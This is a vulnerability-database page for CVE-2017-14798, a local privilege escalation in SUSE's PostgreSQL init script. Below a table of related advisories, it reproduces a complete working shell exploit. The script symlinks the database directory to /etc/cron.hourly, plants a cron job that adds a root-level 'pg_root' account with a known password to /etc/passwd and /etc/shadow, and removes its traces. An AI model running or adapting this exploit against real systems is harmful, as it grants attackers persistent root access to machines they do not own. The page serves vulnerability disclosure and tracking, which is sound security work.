Vulners
Lucene search
PostgreSQL 9.4-0.5.3 - Privilege Escalation
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | PostgreSQL 9.4-0.5.3 - Privilege Escalation Exploit | 13 Aug 201800:00 | – | zdt |
 | CVE-2017-14798 | 13 Aug 201811:29 | – | circl |
 | Micro Focus SUSE Linux Enterprise Server Competitive Conditions Vulnerability | 5 Mar 201800:00 | – | cnvd |
 | CVE-2017-14798 | 1 Mar 201819:00 | – | cve |
 | CVE-2017-14798 local privilege escalation in SUSE postgresql init script | 1 Mar 201819:00 | – | cvelist |
 | EUVD-2017-6287 | 7 Oct 202500:30 | – | euvd |
 | PostgreSQL 9.4-0.5.3 - Privilege Escalation | 13 Aug 201800:00 | – | exploitpack |
 | K000148351: PostgreSQL vulnerabilities CVE-2017-15098, CVE-2017-14798, CVE-2016-7048, CVE-2016-5424, and CVE-2016-5423 | 30 Oct 202422:03 | – | f5 |
 | CVE-2017-14798 | 1 Mar 201820:29 | – | nvd |
 | SUSE: Security Advisory (SUSE-SU-2017:3107-1) | 9 Jun 202100:00 | – | openvas |
10
# Exploit Title: PostgreSQL 9.4-0.5.3 - Privilege Escalation
# Date: 2017-10-11
# Exploit Author: Johannes Segitz
# Vendor Homepage: https://bugzilla.suse.com/show_bug.cgi?id=1062722
# Software Link: -
# Version: Before postgresql-init-9.4-0.5.3.1
# Tested on: SUSE Linux Enterprise 11 SP4
# CVE : CVE-2017-14798
#!/bin/sh
# don't use spaces or other funny characters in here
CRON_DIR='/etc/cron.hourly'
CRON_FILE="$CRON_DIR/totally_not_a_lpe"
declare -a CLEANUP_ELEMENTS=('base' 'global' 'pg_clog' 'pg_hba.conf' 'pg_ident.conf' 'pg_multixact' 'pg_subtrans' 'pg_tblspc' 'pg_twophase' 'PG_VERSION' 'pg_xlog' 'postgresql.conf')
if [ "$(whoami)" != "postgres" ]; then
echo "Must be run as user postgres"
exit -1
fi
cd
echo setting up exploit
mv data data2
ln -s $CRON_DIR data
echo waiting for DB restart
while [ ! -w $CRON_DIR ]; do
sleep 1
done
echo able to write $CRON_DIR
echo '#!/bin/sh' > $CRON_FILE
echo 'echo '"'"'pg_root:x:0:0:,,,:/home/pg_root:/bin/bash'"'"' >> /etc/passwd' >> $CRON_FILE
echo 'echo '"'"'pg_root:$2y$05$6F6hHGfvZ42Mq1EF8V.e8uguGumaZsZ4P9qfjiuHFT/k8B2CZrJaO:16339:0:99999:7:::'"'"' >> /etc/shadow' >> $CRON_FILE
echo "rm $CRON_FILE" >> $CRON_FILE
echo "chown root.root ${CRON_DIR}" >> $CRON_FILE
chmod +x $CRON_FILE
if [ -e $CRON_FILE ]; then
echo wrote $CRON_FILE
else
echo failed to write $CRON_FILE, exiting
exit 1
fi
echo cleaning up
for i in "${CLEANUP_ELEMENTS[@]}"; do
rm -rf "$CRON_DIR/$i"
done
rm data
mv data2 data
echo now wait, depending on CRON_DIR setting you should be able to log into this system with pg_root:foobar soonish. Enjoy!Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Aug 2018 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.9
CVSS 37 - 7.3
EPSS0.00813